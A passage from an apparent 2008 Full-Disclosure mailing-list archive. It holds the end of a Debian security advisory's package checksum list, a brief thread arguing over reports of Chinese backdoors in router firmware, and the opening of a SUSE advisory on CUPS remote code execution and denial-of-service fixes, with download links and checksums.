http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-build-2.4.27-4_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 9044 d677c2765ec285cd2ae65fe376657e10 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-4-itanium-smp_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 244958 285f20f2ee3f7ec6246ae0799a5a3e1d http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-4-itanium_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 243766 e10f65174982b0fad0bb6cb0bdb96eae http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-4-itanium_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 16683002 41d6e31c8d9ab4a72f5c536bf4d2db7f http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-itanium_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 8808 28ea0d2a22689cdf78903dfe8c880b82 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-mckinley-smp_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 8850 8f3e1a627d35cded29666e6f17c7952c http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-4-mckinley-smp_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 16990744 34ae5f2398e380b0d0b5b66ce005014f http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-4-mckinley_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 16636002 52d9ee8a8b36a7290873fa7234d6a6b7 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-4_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 4691092 627c0ebf4a1cd7207abd5e7dc4dbf1c2 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-4-mckinley_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 243636 3de8343d803a316d83a05518d7ccbca3 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-4_ia64.deb Size/MD5 checksum: 23668 fa7dde0df4892ae3ecf13e7ef48eefb5 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors-dev_2.9.1-1sarge4_ia64.deb Size/MD5 checksum: 110608 97b5054f3442426ecda36000e460d1d7 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors3_2.9.1-1sarge4_ia64.deb Size/MD5 checksum: 94792 a7add54463e7eebe42d0e1209b39ed16 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge4_ia64.deb Size/MD5 checksum: 487606 d961d1c7f08a33c5d3f192ff909bac5a http://security.debian.org/pool/updates/main/l/lm-sensors/sensord_2.9.1-1sarge4_ia64.deb Size/MD5 checksum: 64004 e7c35fe3a0240bd3a36fe90790d2dd4c m68k architecture (Motorola Mc680x0) http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-mvme16x_2.4.27-3sarge7_m68k.deb Size/MD5 checksum: 2395408 93f0eb4bb3728673de2dcca48b1f6321 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-mac_2.4.27-3sarge7_m68k.deb Size/MD5 checksum: 2476904 e6435630d84030f7cacd23093a6653eb http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-atari_2.4.27-3sarge7_m68k.deb Size/MD5 checksum: 2543798 80826caca0dc4c439e4b2d3459adff6c http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-mvme147_2.4.27-3sarge7_m68k.deb Size/MD5 checksum: 2323548 47a5c2b13d0ca4c57b5f6504f5b0f4a7 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-q40_2.4.27-3sarge7_m68k.deb Size/MD5 checksum: 2260928 3b2ad7134a31d80224924c6ac3c715d1 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-amiga_2.4.27-3sarge7_m68k.deb Size/MD5 checksum: 2636594 01865c402c1eabfdcafd872b9e513510 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-bvme6000_2.4.27-3sarge7_m68k.deb Size/MD5 checksum: 2393294 b610a211ef03a3e2a82f38468672c917 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-4_m68k.deb Size/MD5 checksum: 17794 398b6bccc2ef8df7eef83b434793fb4c http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors-dev_2.9.1-1sarge4_m68k.deb Size/MD5 checksum: 95102 335230b6c3f37d4a0447bf02dd3d766f http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors3_2.9.1-1sarge4_m68k.deb Size/MD5 checksum: 82852 33044d3d1f33772cabadf35f44b5a24c http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge4_m68k.deb Size/MD5 checksum: 457390 ca7a6f7f524d90a2471e6f06b61c6469 http://security.debian.org/pool/updates/main/l/lm-sensors/sensord_2.9.1-1sarge4_m68k.deb Size/MD5 checksum: 55444 7226ed9f01e5a5be6e5d8f6ac193379a mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-headers-2.4.27_2.4.27-10.sarge4.040815-4_mips.deb Size/MD5 checksum: 4763652 25f504369798f853722d8f63317bda53 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-sb1-swarm-bn_2.4.27-10.sarge4.040815-4_mips.deb Size/MD5 checksum: 7223516 6a1496ab421673c1f8edceb956b3294e http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r5k-ip22_2.4.27-10.sarge4.040815-4_mips.deb Size/MD5 checksum: 3879916 f569ca2cb1e0fb6684d25fbab4a3d153 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r4k-ip22_2.4.27-10.sarge4.040815-4_mips.deb Size/MD5 checksum: 3878204 d3b6143706a6f8459b1c5b180645b103 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-4_mips.deb Size/MD5 checksum: 21614 17a387f7eeb5ec819d702f47cd6373b6 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors-dev_2.9.1-1sarge4_mips.deb Size/MD5 checksum: 102282 5fb38a6229d753605225396f90b620ca http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors3_2.9.1-1sarge4_mips.deb Size/MD5 checksum: 79810 e44f473d8d65c281bfa466b58b772185 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge4_mips.deb Size/MD5 checksum: 469842 4ffcd8c522c5680ed07305433fe6391f http://security.debian.org/pool/updates/main/l/lm-sensors/sensord_2.9.1-1sarge4_mips.deb Size/MD5 checksum: 58210 65e27c3a3cbae0d69dc371cced174a72 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-4_mipsel.deb Size/MD5 checksum: 21948 e10b5a0be635ce80df14c29b754738f2 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r5k-cobalt_2.4.27-10.sarge4.040815-4_mipsel.deb Size/MD5 checksum: 4112190 c6c565011042090ab2158a8d75bdaf4f http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r5k-lasat_2.4.27-10.sarge4.040815-4_mipsel.deb Size/MD5 checksum: 2144980 7e3cffbe800573df5c141c7655491351 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-xxs1500_2.4.27-10.sarge4.040815-4_mipsel.deb Size/MD5 checksum: 4681682 2e22969824ec3e0a37b2b7eed79552dd http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r3k-kn02_2.4.27-10.sarge4.040815-4_mipsel.deb Size/MD5 checksum: 3042410 47d02daf465a611c75d73fab149fd22f http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r4k-kn04_2.4.27-10.sarge4.040815-4_mipsel.deb Size/MD5 checksum: 3002862 f9374af85983392e1229bad8980cbe10 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-sb1-swarm-bn_2.4.27-10.sarge4.040815-4_mipsel.deb Size/MD5 checksum: 7049414 26eb406fb10b1f1d2919d23c9731dc88 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-headers-2.4.27_2.4.27-10.sarge4.040815-4_mipsel.deb Size/MD5 checksum: 4688080 00d80aacdd7585dbc5eecae45528eb17 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors-dev_2.9.1-1sarge4_mipsel.deb Size/MD5 checksum: 99406 cc6e5fbe3876cc14079e45cc872edbd7 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors3_2.9.1-1sarge4_mipsel.deb Size/MD5 checksum: 78408 f3f4f7ade9629d7cf125308da3e98e29 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge4_mipsel.deb Size/MD5 checksum: 465738 1a6d8ae53fafc23f75db2e4bdce116dc http://security.debian.org/pool/updates/main/l/lm-sensors/sensord_2.9.1-1sarge4_mipsel.deb Size/MD5 checksum: 58580 750f1d0ab9127abccc930cdab161460f powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-headers-2.4.27-powerpc_2.4.27-10sarge7_powerpc.deb Size/MD5 checksum: 4803418 2895c2cc6681996860c5cbaac5b34e2b http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-powerpc-smp_2.4.27-10sarge7_powerpc.deb Size/MD5 checksum: 160134 89fe366843d1796419d9163fb78e9f18 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-apus_2.4.27-10sarge7_powerpc.deb Size/MD5 checksum: 146276 ce743df6af1de9d944405bda5c98ba3f http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-powerpc-small_2.4.27-10sarge7_powerpc.deb Size/MD5 checksum: 12763692 534470af2ebb96b81294a9185d172220 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-powerpc_2.4.27-10sarge7_powerpc.deb Size/MD5 checksum: 160066 4b10ac662a2009c4ccba5c37692f5925 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-2.4.27-powerpc_2.4.27-10sarge7_powerpc.deb Size/MD5 checksum: 12336 f85a96390405611be12b0389673ad88e http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-2.4.27-nubus_2.4.27-10sarge7_powerpc.deb Size/MD5 checksum: 12412 592aaed71f5818fa8ba081328ac10189 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-apus_2.4.27-10sarge7_powerpc.deb Size/MD5 checksum: 2505874 7a74220b038f71b38136ac175b38c27f http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-2.4.27-apus_2.4.27-10sarge7_powerpc.deb Size/MD5 checksum: 69284 1f7aeab04481a5da2dcbecd0311d55c8 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-nubus_2.4.27-10sarge7_powerpc.deb Size/MD5 checksum: 1823112 6c0d1f470aabbe9dc7832f276d439e78 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-headers-2.4.27-nubus_2.4.27-10sarge7_powerpc.deb Size/MD5 checksum: 4696040 fb8c7d5014a1127a92e0d47556b33be4 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-powerpc-smp_2.4.27-10sarge7_powerpc.deb Size/MD5 checksum: 13795460 8cc78a8cfdd6e8d7d155d2eea5d76148 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-powerpc_2.4.27-10sarge7_powerpc.deb Size/MD5 checksum: 13490978 dae3afc9c3e6777f44ffafcfba680ae2 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-powerpc-small_2.4.27-10sarge7_powerpc.deb Size/MD5 checksum: 160356 235ac45f5bc53bd85a102f647fc3e049 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-headers-2.4.27-apus_2.4.27-10sarge7_powerpc.deb Size/MD5 checksum: 4685784 65825d0b57c91229818caeaa97279e06 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-nubus_2.4.27-10sarge7_powerpc.deb Size/MD5 checksum: 146108 56582343ff92380a62927551c67f5546 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-4_powerpc.deb Size/MD5 checksum: 20420 5b8c3958a314872538e2e1513a3a87f2 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors-dev_2.9.1-1sarge4_powerpc.deb Size/MD5 checksum: 106010 ec5164cf27e749a8100503f9eb96f205 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors3_2.9.1-1sarge4_powerpc.deb Size/MD5 checksum: 84250 c740c32617f2bd0d7509e753b57e629d http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge4_powerpc.deb Size/MD5 checksum: 476802 4251bff9765fdd34959f37669ce75997 http://security.debian.org/pool/updates/main/l/lm-sensors/sensord_2.9.1-1sarge4_powerpc.deb Size/MD5 checksum: 59454 5f0671474ab506620ea6f569845f19a0 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-4-s390-tape_2.4.27-2sarge7_s390.deb Size/MD5 checksum: 997610 06d087ae6f8a3c91624df8adba422b43 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-4-s390x_2.4.27-2sarge7_s390.deb Size/MD5 checksum: 2977720 4e64930f29e8f2fe942d17447a37842f http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-headers-2.4.27-4_2.4.27-2sarge7_s390.deb Size/MD5 checksum: 4581380 43fe2f93201fefe13b9edb2eecae8494 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-4_s390.deb Size/MD5 checksum: 20798 c3b5b38327d77672f213627967f5c473 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-4-s390_2.4.27-2sarge7_s390.deb Size/MD5 checksum: 2785910 030b4071a671d87020075f6969b9de7b http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-s390/kernel-headers-2.4-s390_2.4.27-1sarge2_s390.deb Size/MD5 checksum: 1916 5f3a222f65f28cc02c3dac36d9fae589 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-s390/kernel-image-2.4-s390_2.4.27-1sarge2_s390.deb Size/MD5 checksum: 1902 e50783f20196403fdb201296faa5f955 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-s390/kernel-image-2.4-s390x_2.4.27-1sarge2_s390.deb Size/MD5 checksum: 1904 e82185af5c4ffc366c91a62c3710b0f7 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors-dev_2.9.1-1sarge4_s390.deb Size/MD5 checksum: 105208 8c5d630434b513e4c9391d92d981714e http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors3_2.9.1-1sarge4_s390.deb Size/MD5 checksum: 86976 43af53da4b8bb0041dd32feca8a62aaa http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge4_s390.deb Size/MD5 checksum: 463770 74d2fb769313f552e3d6e35cb6e29148 http://security.debian.org/pool/updates/main/l/lm-sensors/sensord_2.9.1-1sarge4_s390.deb Size/MD5 checksum: 58088 259139f27527bbb065a05ecf5450d489 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-4-sparc32_2.4.27-9sarge7_sparc.deb Size/MD5 checksum: 3607276 1d74de7f87679773e000d54e0f5d67f8 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-4-sparc32_2.4.27-9sarge7_sparc.deb Size/MD5 checksum: 166192 64b14ea4a0669309c7db71a463a1f8f4 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-4-sparc64_2.4.27-9sarge7_sparc.deb Size/MD5 checksum: 6390838 db1a1833b5a3e3521fd61fb64fe2eddc http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-4_2.4.27-9sarge7_sparc.deb Size/MD5 checksum: 2026788 c891f5c9d9f8abaf72f3e3d1f77cd90e http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-build-2.4.27-4_2.4.27-9sarge7_sparc.deb Size/MD5 checksum: 12082 abc164109907a87b49c369d3174c75b3 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-4-sparc32-smp_2.4.27-9sarge7_sparc.deb Size/MD5 checksum: 167958 f092a4be58b46498a40b9cddd3e36ece http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-4-sparc64-smp_2.4.27-9sarge7_sparc.deb Size/MD5 checksum: 205898 2025b7f2ebc435ff887c53fe219e7045 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-4-sparc32-smp_2.4.27-9sarge7_sparc.deb Size/MD5 checksum: 3796782 2027f646c3098d2d288d58fd23fa4635 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-4-sparc64-smp_2.4.27-9sarge7_sparc.deb Size/MD5 checksum: 6555484 92b0ce9e2a3a56333bb365fe98f7bc05 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-4-sparc64_2.4.27-9sarge7_sparc.deb Size/MD5 checksum: 204510 f43a623b9ca40c506f183d6fff4e1594 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-4_sparc.deb Size/MD5 checksum: 19698 bc4b3afa37eb605fbb21aa213cb3a6de http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-headers-2.4-sparc32_42sarge3_sparc.deb Size/MD5 checksum: 2232 746057a5e29dbdb064bcf4b772d7bf99 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-headers-2.4-sparc32-smp_42sarge3_sparc.deb Size/MD5 checksum: 2238 b603643edb3cdd828155317d85cc46ef http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-headers-2.4-sparc64_42sarge3_sparc.deb Size/MD5 checksum: 2228 aac7dfd77156b6b90ca18fc8c1cff974 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-headers-2.4-sparc64-smp_42sarge3_sparc.deb Size/MD5 checksum: 2238 59514eec80d5fdf2e92cb943c50eb9b9 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-image-2.4-sparc32_42sarge3_sparc.deb Size/MD5 checksum: 2208 2245a85962621b06eab854d81f5e2bd9 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-image-2.4-sparc32-smp_42sarge3_sparc.deb Size/MD5 checksum: 2228 e25173a6212f5788a1eee7272033d92e http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-image-2.4-sparc64_42sarge3_sparc.deb Size/MD5 checksum: 2210 c67bc9270fa69033579ded9a949b0c40 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-image-2.4-sparc64-smp_42sarge3_sparc.deb Size/MD5 checksum: 2224 3640903c50cf3f5ac3ca07e4f1a23e4c http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors-dev_2.9.1-1sarge4_sparc.deb Size/MD5 checksum: 100370 fc7792dfa08b4c197d3ba673cf229f91 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors3_2.9.1-1sarge4_sparc.deb Size/MD5 checksum: 80992 f877376ad39a4899a32b1c00cc7f8069 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge4_sparc.deb Size/MD5 checksum: 470320 6daf1e125485e018d5ad162fec69eb15 http://security.debian.org/pool/updates/main/l/lm-sensors/sensord_2.9.1-1sarge4_sparc.deb Size/MD5 checksum: 56758 1aded5c241d250319d644ef30d7434e6 These files will probably be moved into the oldstable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ sarge/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/sarge/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHz6FThuANDBmkLRkRAgb/AJ98Nw2MnfF7vwRnBvvekwutEkR4ggCbBzGH xgae8yQuo7Fy9adwNnZrn0I= =zIeD -----END PGP SIGNATURE----- From chedder1 at gmail.com Thu Mar 6 09:21:53 2008 From: chedder1 at gmail.com (chedder1 at gmail.com) Date: Thu, 6 Mar 2008 01:21:53 -0800 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> Message-ID: <20080306092153.GA1626@chaotica> COULD, this article makes no specific claims. the chinese government COULD have a audio recording device hidden inside your asshole at this very moment. On Thu, Mar 06, 2008 at 10:09:53AM +1100, Ivan . wrote: > http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From ivanhec at gmail.com Thu Mar 6 09:46:37 2008 From: ivanhec at gmail.com (Ivan .) Date: Thu, 6 Mar 2008 20:46:37 +1100 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <20080306092153.GA1626@chaotica> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <20080306092153.GA1626@chaotica> Message-ID: <6450e99d0803060146m5ff83578pbe3cd9d4beac1303@mail.gmail.com> so what? It doesn't have to make specific ascertains. The fact of the matter is that government sponsored corporate/industrial espionage happens all the time. Echelon spy network revealed http://news.bbc.co.uk/1/hi/world/503224.stm Echelon: Government spying breeds business distrust http://news.zdnet.co.uk/itmanagement/0,1000000308,2079881,00.htm Update: America uses Echelon to spy on Britain http://news.zdnet.co.uk/security/0,1000000189,2079921,00.htm On Thu, Mar 6, 2008 at 8:21 PM, wrote: > COULD, this article makes no specific claims. the chinese government COULD have a audio recording device hidden inside your asshole at this very moment. > > On Thu, Mar 06, 2008 at 10:09:53AM +1100, Ivan . wrote: > > http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html > > > > _______________________________________________ > > > > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From thomas at suse.de Thu Mar 6 10:07:28 2008 From: thomas at suse.de (Thomas Biege) Date: Thu, 06 Mar 2008 11:07:28 +0100 Subject: [Full-disclosure] SUSE Security Announcement: cups (SUSE-SA:2008:012) Message-ID: <47cfc260.jSsrHiJh+tKsIpNG%thomas@suse.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ______________________________________________________________________________ SUSE Security Announcement Package: cups Announcement ID: SUSE-SA:2008:012 Date: Thu, 06 Mar 2008 11:00:00 +0000 Affected Products: SUSE LINUX 10.1 openSUSE 10.2 openSUSE 10.3 SuSE Linux Enterprise Server 8 SUSE SLES 9 Novell Linux Desktop 9 Open Enterprise Server Novell Linux POS 9 SUSE Linux Enterprise Desktop 10 SP1 SUSE Linux Enterprise Server 10 SP1 Vulnerability Type: remote code execution Severity (1-10): 7 SUSE Default Package: yes Cross-References: CVE-2008-0596 CVE-2008-0597 CVE-2008-0882 Content of This Advisory: 1) Security Vulnerability Resolved: remote code execution and multiple denial-of-service bugs Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: none 6) Authenticity Verification and Additional Information ______________________________________________________________________________ 1) Problem Description and Brief Discussion CUPS is the default printer system on SUSE Linux. The current security update of cups fixes a double-free bug in the function process_browse_data() that can lead to a remote denial-of-service by crash- ing cupsd or possibly to a remote code execution (CVE-2008-0882). The bug can only be exploited if cupsd listens to 631/udp by crafted UDP Browse packets. Additionally two remote denial-of-service bugs were fixed. The first one can be triggered via crafted IPP packets to use a pointer after it was freed (CVE-2008-0597) and the second issue is a memory-leak caused by a large number of requests to add and remove shared printers (CVE-2008-0596). 2) Solution or Work-Around No work-around known. Please install the new cups package. 3) Special Instructions and Notes Restart the cups server after the update. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv to apply the update, replacing with the filename of the downloaded RPM package. x86 Platform: openSUSE 10.3: http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/cups-1.2.12-22.9.i586.rpm 58a5a276cce67effbd6fbe8154bbfb61 http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/cups-client-1.2.12-22.9.i586.rpm 6d40b6ce8b5fd0a72cd25d8f6fbf8859 http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/cups-devel-1.2.12-22.9.i586.rpm 9b3055b00b3ca8ff417b72a981b9e301 http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/cups-libs-1.2.12-22.9.i586.rpm 8f8e73fe3aece7a53f4f51bfce87d921 openSUSE 10.2: ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/cups-1.2.7-12.11.i586.rpm ce2f6be0cf30e3b71b646e62a029cb79 ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/cups-client-1.2.7-12.11.i586.rpm 0a23fa9760a2a88cd1e8451b8d5b48a6 ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/cups-devel-1.2.7-12.11.i586.rpm b87ce06a93ee2ef1062153b2a8689749 ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/cups-libs-1.2.7-12.11.i586.rpm 7fc972995c533e45ce7577545576e1b9 SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/cups-1.1.23-40.38.i586.rpm 4ef1069e44543a4e07048b21128c19a3 ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/cups-client-1.1.23-40.38.i586.rpm a0ed40efdfa03596535ff90d990409cb ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/cups-devel-1.1.23-40.38.i586.rpm f205135dea30ff1079e342e86ac0c240 ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/cups-libs-1.1.23-40.38.i586.rpm 3e82329efd71ea8987c6f5ad06f1dcc3 Power PC Platform: openSUSE 10.3: http://download.opensuse.org/pub/opensuse/update/10.3/rpm/ppc/cups-1.2.12-22.9.ppc.rpm 1de1c175ed2609c7b6fb17adf619a3bd http://download.opensuse.org/pub/opensuse/update/10.3/rpm/ppc/cups-client-1.2.12-22.9.ppc.rpm e9b59c6c02679bf8ef010fdc9133211e http://download.opensuse.org/pub/opensuse/update/10.3/rpm/ppc/cups-devel-1.2.12-22.9.ppc.rpm c82e8802db9f891d8d0b8ee4ca6f1b0c http://download.opensuse.org/pub/opensuse/update/10.3/rpm/ppc/cups-libs-1.2.12-22.9.ppc.rpm 46fd5eddc31037acd8a26bcb11d351d4 openSUSE 10.2: ftp://ftp.suse.com/pub/suse/update/10.2/rpm/ppc/cups-1.2.7-12.11.ppc.rpm 3d688a3ec198f3c9a31951caf95ddbb6 ftp://ftp.suse.com/pub/suse/update/10.2/rpm/ppc/cups-client-1.2.7-12.11.ppc.rpm e50f0eca33d3666c938648fafd472e1b ftp://ftp.suse.com/pub/suse/update/10.2/rpm/ppc/cups-devel-1.2.7-12.11.ppc.rpm cffbbe682c5970e95a42af1c2a5321d5 ftp://ftp.suse.com/pub/suse/update/10.2/rpm/ppc/cups-libs-1.2.7-12.11.ppc.rpm aef41b836d4b0f71daa623ae0fead618 SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/cups-1.1.23-40.38.ppc.rpm 9878a85c10c4c1299a6f6e8d7887d701 